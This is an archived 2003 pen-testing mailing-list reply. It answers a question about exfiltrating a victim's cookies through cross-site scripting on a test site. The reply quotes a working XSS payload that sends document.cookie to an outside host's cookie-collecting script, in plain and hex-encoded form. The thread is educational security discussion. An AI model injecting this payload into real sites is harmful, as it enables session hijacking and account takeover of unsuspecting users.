RE: Proof of Concept Tool on Web Application Security
From: Robert Auger (rauger@spidynamics.com)
Date: 04/14/03
- Previous message: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
- In reply to: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
- Next in thread: Jon Pastore: "Re: Proof of Concept Tool on Web Application Security"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Robert Auger" <rauger@spidynamics.com> To: "'Indian Tiger'" <indiantiger@mailandnews.com>, <pen-test@securityfocus.com>, <rdawes@deloitte.co.za> Date: Mon, 14 Apr 2003 11:12:52 -0400
>Now I am testing Cross-Site Scripting to steal the client cookies, or any
>other sensitive information. I am working on my own pen-test-testing site,
>which is vulnerable to XSS. I was able to display the cookies of the client
at
>the victim’s machine, but that was not my goal, my goal is to get that
cookies
>on my machine or any desired location. So is there any way by which I can
>transfer the victim’s cookie or any other information at my machine without
>interaction of the victim.
This is covered in the cross site scripting FAQ located at
http://www.cgisecurity.com/articles/xss-faq.shtml.
The relevant JavaScript code you are looking for is as follows (A example
from the paper).
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'
+document.cookie</script>
(IN HEX)
%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
3d%27%68%74%74
%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%
67%69%2d%62%69%6e
%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%
6f%6f%6b%69%65%3c
%2f%73%63%72%69%70%74%3e
(Note: This website has a public script that can be used for testing cookie
theft.)
Regards,
Robert Auger
SPI Labs
--------------------------------------------------------------
Costs are climbing and complaints are rising
as SPAM overloads your e-mail servers and Inboxes
SurfControl E-mail Filter puts the brakes on spam & viruses
and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2
Download a free trial and see just
what's going in and out of your organization.
--------------------------------------------------------------
- Previous message: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
- In reply to: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
- Next in thread: Jon Pastore: "Re: Proof of Concept Tool on Web Application Security"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
